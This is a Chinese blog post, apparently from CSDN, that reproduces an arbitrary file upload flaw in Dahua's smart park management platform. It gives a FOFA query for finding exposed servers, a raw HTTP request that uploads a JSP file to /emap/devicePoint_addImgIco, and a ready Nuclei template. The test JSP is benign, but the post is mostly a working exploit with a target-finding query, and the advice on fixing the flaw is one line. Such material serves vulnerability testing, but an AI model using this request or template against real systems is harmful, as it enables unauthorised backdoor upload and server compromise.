大华智慧园区综合管理平台/emap/devicePoint RCE漏洞

最新推荐文章于 2024-06-07 07:48:08 发布
最新推荐文章于 2024-06-07 07:48:08 发布
阅读量723 收藏 5
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136043056
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

大华园区综合管理平台可能是一个集成多种管理功能的平台,例如安全监控、设备管理、人员管理等。这样的平台通常有助于提高园区运营效率和安全性。

大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷

Ⅱ、fofa语句

body="/WPMS/asset/lib/gridster/"

Ⅲ、漏洞复现

POC

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="ceshi.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
 
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

1、构建poc

2、文件上传后,端口重定向到8314

http://127.0.0.1​:8314/upload/emap/society_new/ico_res_c2c0a12203d2_on.jsp

Ⅳ、Nuclei-POC

id: Dahua-emap-devicePoint-uploadfile

info:
  name: 大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="/WPMS/asset/lib/gridster/"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
        
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Content-Disposition: form-data; name="upload"; filename="{{filename}}.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary
        
        <% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--




    extractors:
      - type: json      #类型为json      
        part: body      # 提取的位置 
        json:
          - .data   

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"jsp","data")

Ⅴ、修复建议

做好访问控制策略

Love Seed
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大华智慧园区综合管理平台RCE漏洞复现(0day)
0xSec
07-15 4417
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
2023-0Day(漏洞检测Tools)V1.4 HW-漏洞挖掘-src
08-23
工具介绍 为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测工具 8月22日 漏洞检测Tools V1.0更新漏洞利用如下: 1、用友移动管理系统文件上传漏洞(YonyouMa UPload) 2、用友NC-grouptemplet接口文件上传 3、安恒明御堡垒机任意用户添加 4、致远互联FE协作办公平台文件上传漏洞 2023/8/10,V1.1更新漏洞利用如下: 5、网神SecGate 3600防火墙文件上传漏洞 6、泛微EOffice未授权访问漏洞 7、泛微EOfficeSQL注入漏洞 8、绿盟SAS堡垒机任意用户登录漏洞 2023/8/11,V1.2更新漏洞利用如下: 9、大华智慧园区综合管理平台emap文件上传 10、大华智慧园区综合管理平台SQL注入 11、用友时空KSOA_SQL注入
大华智慧园区前台任意文件上传漏洞 (CVE-2023-3836)
m0_57900228的博客
01-25 771
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。打开Burp Suite,把payload复制进去,把地址改成自己要测试的地址和端口,然后重发一下,就会得到上传的jsp一句话名称,如图。建议使用相关系统的用户在尽快打补丁的同时,做好访问来源的限制,尽量避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。4.1、验证url,看看是否被解析。2、验证是否存在漏洞
BUUCTF(web刷题记录一)
nareku的博客
04-16 8599
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
【1day】复现大华智慧园区综合管理平台存在文件上传漏洞
记录并分享学习安全的知识点..
08-14 384
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台/publishing/publishing/material/file/video接口存在文件上传漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧园区前台任意文件上传(1day)
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
10-06 373
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在在野 0day 漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。
大华智慧园区综合管理平台任意文件上传漏洞
xiaokp7的博客
07-30 1079
智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求/emap/devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 1944
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
emap组件使用
flybone7的博客
11-23 904
定义一个插件 plugin $.fn.emapdatatable = function(options, params, callback, flag) {}; jquery中的$.fn的用法 一、$.fn.method()=function(){}和$.fn.extend({})的比较 jQuery.fn ===$.fn=== jQuery.prototype $.fn.metho...
2023-0Day(漏洞检测Tools)HW-漏洞挖掘-src
08-23
工具介绍 为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测...9、大华智慧园区综合管理平台emap文件上传 10、大华智慧园区综合管理平台SQL注入 11、用友时空KSOA_SQL注入
eMap.rar_eMap.rc2_emap_电子地图_长沙电子地图
09-24
长沙电子地图,可以计算任意两个站点的最短路径
EMAP toolbox for MATLAB-开源
04-28
这是用于EMAP和SGA遗传相互作用数据的质量控制和评分的MATLAB工具箱。 它包括一个图形用户界面和一些自动绘图生成工具。
EMAP: Client and Server Development-开源
05-13
加密消息和身份验证协议,客户端和服务器。 该项目旨在进一步发展加密消息和身份验证协议。
红日代码审计(day1-day14)
weixin_44897902的博客
01-05 8415
day_1:wishlist class Challenge { const UPLOAD_DIRECTORY = './solutions/'; private $file; private $whitelist; public function __construct($file) { $this->file = $file; $this->whi...
echaer 地图_echarts Map(地图) 不同颜色区块显示
weixin_42303282的博客
12-23 513
echarts Map(地图) 不同区块显示这里以重庆地图为例配置项:var option = {title : {text: '重庆市',subtext: '',x:'left'},tooltip : {trigger: 'item',formatter: '{b}',itemSize:'14px'},legend: {orient: 'vertical',x:'center',data:['重...
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 915
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
应用程序加固的优势及其在移动应用安全中的重要性
gulu230220的博客
06-05 404
通过提升应用程序的安全性、防止应用程序被篡改、提高应用程序的抗攻击能力、保护应用程序的知识产权和提升用户体验和信任度,加固技术可以有效保障移动应用的安全和稳定,为用户提供更加安全和可靠的移动应用服务。通过加固应用程序的安全漏洞和弱点,加固技术可以防止黑客利用已知的攻击手段和工具对应用程序进行攻击,提高应用程序的安全性和稳定性。通过加密和混淆应用程序的源代码和关键算法,加固技术可以防止黑客和竞争对手获取应用程序的源代码和商业机密,保护开发者的创新成果和商业利益。应用程序加固能够有效提升移动应用程序的安全性。
《软件定义安全》之二:SDN/NFV环境中的安全问题
最新发布
wuxiaobing1234的博客
06-07 735
南向协议主要侧重于南向接口上的数据转发、网络配置、数据平面信息收集等功能。OpenFlow协议OpenFlow是SDN的标志性技术,他体现了SDN的核心思想:控制与转发分离。它通过流表控制技术支持用户对数据流行为进行控制。OpenFlow交换机根据流表来转发数据包,代表数据转发平面;控制器通过全网络视图来实现管控功能,其控制逻辑表示控制平面。OpenFlow协议的发展演进一直都围绕着两个方面,一方面是控制平面的增强,让系统功能更丰富、更灵活;
跨区域文件管控过程中 如何保障安全和效率?
文件数据安全交换
06-03 600
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
/emap/webservice/gis/soap/poi
12-10
/emap/webservice/gis/soap/poi是一个web服务的路径,提供的功能是地理信息系统中的兴趣点查询。POI即Point of Interest的缩写,指的是地图上特定的感兴趣的地点,比如餐馆、酒店、商店等。 通过/emap/webservice/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值